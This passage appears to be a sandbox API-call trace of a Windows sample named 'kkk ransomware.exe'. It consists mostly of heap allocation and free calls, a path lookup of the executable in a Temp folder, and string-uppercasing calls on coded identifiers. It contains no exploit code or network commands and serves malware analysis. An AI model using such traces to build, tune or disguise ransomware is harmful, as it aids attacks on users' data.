Flags=0x0, Size=0x10) returned 0x2afaa28 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6950 [0080.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af68a0 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afaaa0 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afaa58 [0080.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afaa10 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afaa70 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afaa10 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb128 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb1a0 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb020 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb1b8 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afad78 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af68c0 [0080.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb110 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb098 [0080.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb1b8 | out: hHeap=0x2af0000) returned 1 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb2f0 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x2af0588 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb278 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2afaf30 [0080.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af6960 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb0f8 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb0c8 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb278 | out: hHeap=0x2af0000) returned 1 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x200) returned 0x2afb3f8 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afaae0 | out: hHeap=0x2af0000) returned 1 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb0e0 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6) returned 0x2af6920 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb1b8 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb038 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2af69d0 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6920 | out: hHeap=0x2af0000) returned 1 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb290 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2afb308 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb1b8 | out: hHeap=0x2af0000) returned 1 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb050 [0080.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2afb248 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb200 | out: hHeap=0x2af0000) returned 1 [0080.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb200 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af69a0 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb1b8 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb2d8 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb350 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af68e0 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb368 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb810 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb7c8 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6930 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb8e8 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb810 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb7e0 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6880 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb630 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb9a8 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb9c0 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6890 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb990 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbae0 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afba38 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6910 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbca8 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afb3f8 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbca8 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbbd0 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af6920 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbca8 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbd98 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbd80 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc308 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbdc8 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc740 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc650 | out: hHeap=0x2af0000) returned 1 [0080.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc408 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc8a8 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc7a0 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc848 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc288 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc848 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc950 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc950 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc3b8 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbdc8 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd290 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd530 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc338 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd308 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd3f8 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd350 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc298 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd3c8 | out: hHeap=0x2af0000) returned 1 [0080.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd608 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd578 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc428 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd6e0 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd6e0 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd848 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc3d8 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd878 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd938 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd7d0 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc378 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd7d0 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afda88 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdbd8 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc318 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afda10 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdc20 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdb48 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc338 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afd980 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdc98 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdda0 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc5a8 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdc98 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afbe10 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdc98 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdda0 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe738 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe738 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe780 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc448 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe840 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe738 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe960 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc488 | out: hHeap=0x2af0000) returned 1 [0080.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afe7e0 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afea68 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afea20 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc4a8 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afeaf8 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afea68 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afebb8 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc578 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afeaf8 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afed20 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afed98 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc5f8 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afed08 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afede0 | out: hHeap=0x2af0000) returned 1 [0080.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afdda0 | out: hHeap=0x2af0000) returned 1 [0080.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2afc448 | out: hHeap=0x2af0000) returned 1 [0080.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f4428 | out: hHeap=0x2af0000) returned 1 [0080.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af0588 | out: hHeap=0x2af0000) returned 1 [0080.345] CloseHandle (hObject=0x274) returned 1 [0080.345] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", nBufferLength=0x104, lpBuffer=0x8cfa78, lpFilePart=0x4a7f50 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\kkk ransomware.exe", lpFilePart=0x4a7f50*="kkk ransomware.exe") returned 0x35 [0080.356] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0080.356] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0080.356] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0080.356] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0080.357] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0080.357] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0080.357] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0080.358] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 